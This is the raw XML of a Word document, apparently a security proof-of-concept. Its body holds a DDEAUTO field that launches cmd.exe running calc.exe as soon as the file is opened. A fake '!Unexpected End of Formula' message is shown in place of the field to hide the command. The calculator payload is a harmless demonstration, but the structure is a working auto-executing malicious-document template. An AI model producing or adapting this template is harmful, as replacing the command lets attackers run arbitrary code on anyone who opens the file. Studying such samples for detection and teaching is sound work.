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21931" w:rsidRPr="00DA0AAF" w:rsidRDefault="00DA0AAF" w:rsidP="00DA0AAF">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" </w:instrText>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>!Unexpected End of Formula</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D21931" w:rsidRPr="00DA0A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AF"/>
    <w:rsid w:val="006370D0"/>
    <w:rsid w:val="00D02DC1"/>
    <w:rsid w:val="00D21931"/>
    <w:rsid w:val="00DA0AAF"/>
    <w:rsid w:val="00DD1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75D8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1622DB57-5F62-4340-8D6D-15B99746C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12</Words>
  <Characters>74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DSU</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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DSU</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>DSU</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-01T20:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-01T20:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>